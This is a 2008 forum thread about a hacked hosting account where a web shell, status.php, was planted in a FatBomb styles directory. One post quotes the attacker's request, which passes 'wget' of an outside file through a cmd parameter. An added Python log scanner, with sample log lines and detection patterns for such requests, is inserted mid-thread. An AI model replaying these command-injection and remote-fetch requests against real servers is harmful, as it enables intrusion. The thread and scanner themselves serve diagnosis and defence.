Kurt
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-16-08, 10:01 AM (PST)

1. "RE: Hosting issue"

Hi David,

What is this? http://megatroll.com/fatbomb-data/styles/status.php?

This doesn't make any sense to me at all... It's not FatBomb.

One, Fatty should be installed in the cgi-bin.
Two, Fatty doesn't use a directory structure that includes /fatbomb-data.
Three, it doesn't have a "styles" directory.
Four, and it's not a php script. Fatty is a cgi script.

What's this status.php reference? Your host has given no useful information, just a URL. Instead of a URL they need to provide some type of server error message.
-Boom boom boom boom.
tasari
Member since Dec-8-02
1752 posts, 1 feedbacks, 2 points
Jan-16-08, 02:45 PM (PST)

2. "RE: Hosting issue"

LAST EDITED ON Jan-16-08 AT 02:50 PM (PST)

I had that issue many times on my server (different domains => not with Tuelz or Kurt's scripts). This is a way to overload your hosting account/server!

d=/home/sites/megatroll.com/public_html/fatbomb-data/styles/temp/&cmd=wget http://cashandassets.net/source/cb.txt

This part is the cause... it gets an external file on another host, but often this is a php file called here as a text file. Often it loops over and over and loads the server.

Some questions...

1) Did you make that "fatbomb-data" directory yourself?
1a) If yes, where did you get it? You need to alert them that there is a security issue with their script, at least with status.php.
2a) If no, then you have a hacker that got access to your hosting account and created that directory to launch that URL which causes the overload. Often hackers get access from a script installed there, but you need to look at the php scripts, not Kurt's ones, all are cgi or via Tuelz...

Let us know
Tasari
kiosk2
Member since Apr-10-06
Jan-18-08, 10:17 AM (PST)

3. "RE: Hosting issue"

Hi

I've had problems replying here. The script was installed by Kurt's support guy/programmer after I purchased it and has remained pretty much as is, as I couldn't get my head round the customization. What do I need to do to resolve it, and if it has been hacked, is the script vulnerable?

Thanks again.
David
kiosk2
Member since Apr-10-06
Jan-18-08, 10:17 AM (PST)

4. "RE: Hosting issue"

Further to my last post - yes, there were some dodgy php files that had been placed inside that folder (which has the templates in, I think). I have deleted them (along with the templates folder - whoops, I have a backup at home though) and have asked the hosting company to re-enable scripting and to check how the site was hacked, as there were no other scripts on the site other than Kurt's which, as you say, are all cgi scripts.

Thanks for your help.
David

PS - I WILL get round to setting the site to its true potential one day!!
Kurt
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-18-08, 10:21 AM (PST)

5. "RE: Hosting issue"

Hi David,

Tasari gave good advice above. I really can't give you any more advice since the problems seem to be associated with a php script and don't have anything to do with Fatty directly. I wish I could be more help but without more info there's not a lot we can do on this end.
-Boom boom boom boom.
Kurt
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-22-08, 10:29 AM (PST)

6. "RE: Hosting issue"

This is what Kirill has to say:

"The site was, indeed, hacked, but it does not seem to be related to FatBomb. The directory 'fatbomb-data/styles' was created by me during installation; it holds images and CSS files that are used by default fatbomb templates.

The PHP file has nothing to do with FatBomb though; it's a typical hacker trick. When a hacker gets the ability to upload files to the server, he usually uploads a script that allows him to run arbitrary commands remotely. This script usually has some "typical" name, like "status.php" in this case, and is uploaded to some place deep in the filesystem tree. In this case, the attacker uploaded the script to "fatbomb-data/styles" in the hope that nobody would notice it for a long time. I bet if the site owner reviews the other directories of the site, he will find many other similar scripts with innocent names allowing remote command execution.

With regard to the script that was used to compromise the site initially, I highly doubt it was FatBomb. 99% that it was an insecure WordPress, phpBB2, or some other popular PHP program."
-Boom boom boom boom.
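An added example (not part of the thread, and not FatBomb code): a Python pass over web access-log lines that finds scripts being driven the way the request Tasari quoted drives status.php, with a command passed in a query parameter. The log lines are constructed, and the parameter names, fetch tools and asset-directory names are assumptions to adjust for the site.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in Apache combined log format (not real log data).
SAMPLE_LOG = """\
198.51.100.7 - - [16/Jan/2008:09:12:01 -0800] "GET /fatbomb-data/styles/main.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [16/Jan/2008:09:14:33 -0800] "GET /fatbomb-data/styles/status.php?d=/home/sites/megatroll.com/public_html/fatbomb-data/styles/temp/&cmd=wget%20http://remote.example/cb.txt HTTP/1.1" 200 412 "-" "libwww-perl/5.805"
203.0.113.9 - - [16/Jan/2008:09:14:40 -0800] "GET /fatbomb-data/styles/status.php?d=/tmp/&cmd=id HTTP/1.1" 200 97 "-" "libwww-perl/5.805"
198.51.100.7 - - [16/Jan/2008:09:15:02 -0800] "GET /cgi-bin/example.cgi?q=cmd+line+tools HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" \d{3}')
CMD_PARAMS = {"cmd", "command", "exec"}            # assumed parameter names
FETCH = re.compile(r"^\s*(wget|curl|fetch|lwp-download)\s+.*https?://", re.I)
STATIC_DIRS = {"styles", "css", "images", "img"}   # assumed asset directories

def find_command_scripts(log_text):
    """Group requests that pass a command in a query parameter, by script path."""
    found = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, when, target = m.groups()
        url = urlsplit(target)
        reasons = set()
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name.lower() in CMD_PARAMS and value.strip():
                reasons.add("command parameter")
            if FETCH.search(value):
                reasons.add("remote fetch in parameter")
        if not reasons:
            continue
        parts = url.path.lower().split("/")
        if parts[-1].endswith(".php") and STATIC_DIRS & set(parts[:-1]):
            reasons.add("script in static-asset directory")
        # first_seen is the first matching line, so the log must be in time order.
        entry = found.setdefault(url.path, {"hits": 0, "clients": set(),
                                            "first_seen": when, "reasons": set()})
        entry["hits"] += 1
        entry["clients"].add(client)
        entry["reasons"] |= reasons
    return found

if __name__ == "__main__":
    for path, info in find_command_scripts(SAMPLE_LOG).items():
        print(path, info["hits"], sorted(info["clients"]), info["first_seen"],
              sorted(info["reasons"]))
```

The first-seen time and client addresses for each flagged path give the hosting company a starting point for checking how the file was uploaded.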
kiosk2
Member since Apr-10-06
Jan-22-08, 02:46 PM (PST)

7. "RE: Hosting issue"

Thanks. Fatbomb was/is the only script installed on the site. It is on a shared hosting server, so it could have come via another site on there? At least we identified the offending stuff and it's working ok now. Just need to upload the styles folder again. Now where did I put it?

Thanks again for your help.
David